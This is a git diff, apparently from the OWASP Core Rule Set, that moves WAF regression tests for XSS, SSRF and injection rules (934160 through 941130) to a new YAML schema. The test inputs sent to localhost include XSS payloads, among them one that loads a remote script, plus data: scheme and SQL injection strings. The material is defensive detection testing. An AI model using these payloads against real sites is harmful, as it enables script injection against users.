Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml index 9d3111052..2505e4abe 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml @@ -1,61 +1,60 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "934170.yaml" description: "Tests for rule 934170 - PHP data scheme support" +rule_id: 934170 tests: - - test_title: 934170-1 + - test_id: 1 desc: "SSRF - data: scheme test - IN2OZO3N coverage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" - version: "HTTP/1.1" - output: - log_contains: id "934170" - - test_title: 934170-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" + version: "HTTP/1.1" + output: + log: + expect_ids: [934170] + - test_id: 2 desc: "Negative test - data:// should not match" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" - version: "HTTP/1.1" - output: - no_log_contains: id "934170" - - test_title: 934170-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934170] + - test_id: 3 desc: "Status Page Test - SSRF - data: scheme test - simple trigger, isolated test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data:text/plain" - version: "HTTP/1.1" - output: - log_contains: id "934170" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data:text/plain" + version: "HTTP/1.1" + output: + log: + expect_ids: [934170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml index e2f420869..b0e54a727 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml @@ -1,107 +1,104 @@ --- meta: author: "csanders-git, Walter Hop, azurit" - enabled: true - name: "941100.yaml" - description: "Tests to trigger, or not trigger 941100" +rule_id: 941100 tests: - - test_title: 941100-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] + - test_id: 3 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E' - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E' + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] + - test_id: 4 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941100" - - test_title: 941100-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941100] + - test_id: 5 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941100" - - test_title: 941100-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941100] + - test_id: 6 desc: Status Page Test - simplified XSS testing of libinjection in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: - foo= - version: "HTTP/1.1" - output: - log_contains: id "941100" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: foo= + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml index fb0718523..d80795be4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml @@ -1,54 +1,52 @@ --- meta: author: "4v3r9, Walter Hop, azurit" - enabled: true - name: "941101.yaml" - description: "Test to trigger 941101" +rule_id: 941101 tests: - - test_title: 941101-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: www.github.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: xyz= + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 2 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?x=alert(1);" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?x=alert(1);" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 3 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "<script+>alert(1);</script>=value" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "<script+>alert(1);</script>=value" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 4 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: "" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Referer: "" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 5 desc: XSS in URI / PATH_INFO going undetected - GH issue 1022 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 6 desc: XSS in payload using %uNNNN stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + data: | + var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 7 desc: XSS in payload with individual code points urlencoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + data: | + var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 8 desc: XSS in cookie name using unicode stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Cookie: <script >alert(1)</script>=value - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-9 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Cookie: <script >alert(1)</script>=value + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 9 desc: XSS in Referer using html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "<script+>alert(1);</script>" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-10 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "<script+>alert(1);</script>" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 10 desc: GH issue 1481 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941110" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941110] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index 3a705d494..46415eef9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml @@ -1,104 +1,102 @@ --- meta: author: "Christian S.J. Peron, Walter Hop, azurit" - description: None - enabled: true - name: 941120.yaml +rule_id: 941120 tests: - - test_title: 941120-1 + - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onload%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onload%3d%20=vardata" + version: HTTP/1.0 + output: + log: + expect_ids: [941120] + - test_id: 2 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefgh%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefgh%3d%20=vardata" + version: HTTP/1.0 + output: + log: + expect_ids: [941120] + - test_id: 3 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onab%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onab%3d%20=vardata" + version: HTTP/1.0 + output: + log: + no_expect_ids: [941120] + - test_id: 4 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" + version: HTTP/1.0 + output: + log: + no_expect_ids: [941120] + - test_id: 5 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "941120" - - test_title: 941120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941120] + - test_id: 6 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log: + expect_ids: [941120] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 4a8eb1bf2..c6190136a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml @@ -1,327 +1,325 @@ --- meta: author: "csanders-git, Christian Folini, azurit" - description: "Tests to trigger, or not trigger 941130" - enabled: true - name: 941130.yaml +rule_id: 941130 tests: - - test_title: 941130-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941130" - - test_title: 941130-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941130] + - test_id: 2 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 3 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=aai" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=aai" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 4 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=abcd'||(select extractvalue(xmltype('%cgger;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=abcd'||(select extractvalue(xmltype('%cgger;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 5 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - 